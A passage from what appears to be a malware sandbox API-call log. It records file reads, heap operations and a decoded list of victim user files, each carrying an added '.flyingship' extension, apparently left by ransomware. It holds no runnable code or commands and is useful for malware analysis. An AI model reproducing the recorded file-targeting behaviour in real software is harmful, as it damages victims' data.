liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf510 | out: lpNewFilePointer=0x0) returned 1 [0248.390] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4128 [0248.390] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52700 [0248.390] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4158 [0248.390] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52710 [0248.390] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4f4 | out: lpNewFilePointer=0x0) returned 1 [0248.390] ReadFile (in: hFile=0x5fc, lpBuffer=0xe6abc0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf51c, lpOverlapped=0x0 | out: lpBuffer=0xe6abc0*, lpNumberOfBytesRead=0x8bf51c*=0x4011, lpOverlapped=0x0) returned 1 [0248.391] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe51280 [0248.391] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4158 | out: hHeap=0xbe0000) returned 1 [0248.391] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x70) returned 0xdffa58 [0248.391] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe51280 | out: hHeap=0xbe0000) returned 1 [0248.391] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xf0) returned 0xdf1018 [0248.391] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdffa58 | out: hHeap=0xbe0000) returned 1 [0248.391] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1f0) returned 0xe636b8 [0248.391] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf1018 | out: hHeap=0xbe0000) returned 1 [0248.391] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x3f0) returned 0xe638b0 [0248.391] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe636b8 | out: hHeap=0xbe0000) returned 1 [0248.391] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x7f0) returned 0xe611e0 [0248.391] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe638b0 | out: hHeap=0xbe0000) returned 1 [0248.391] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xff0) returned 0xe533c8 [0248.391] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe611e0 | out: hHeap=0xbe0000) returned 1 [0248.391] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1ff0) returned 0xe7abc8 [0248.391] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533c8 | out: hHeap=0xbe0000) returned 1 [0248.391] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x3ff0) returned 0xe7cbc0 [0248.392] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe7abc8 | out: hHeap=0xbe0000) returned 1 [0248.392] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x7ff0) returned 0xe80bb8 [0248.392] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe7cbc0 | out: hHeap=0xbe0000) returned 1 [0248.392] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xe80bb8, cbMultiByte=16402, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16402 [0248.392] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8024) returned 0xe88bb0 [0248.392] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xe80bb8, cbMultiByte=16402, lpWideCharStr=0xe88bb0, cchWideChar=16402 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.flyingship.ppt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.flyingship.exe\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.flyingship.ods\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.flyingship.ppt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.flyingship.pdf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.flyingship.xls\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.flyingship.pdf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.flyingship.pdf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.flyingship.xls\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.flyingship.ico\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.flyingship.ods\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.flyingship.pst\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.flyingship.xls\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.flyingship.ots\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.flyingship.ots\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.flyingship.ots\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS 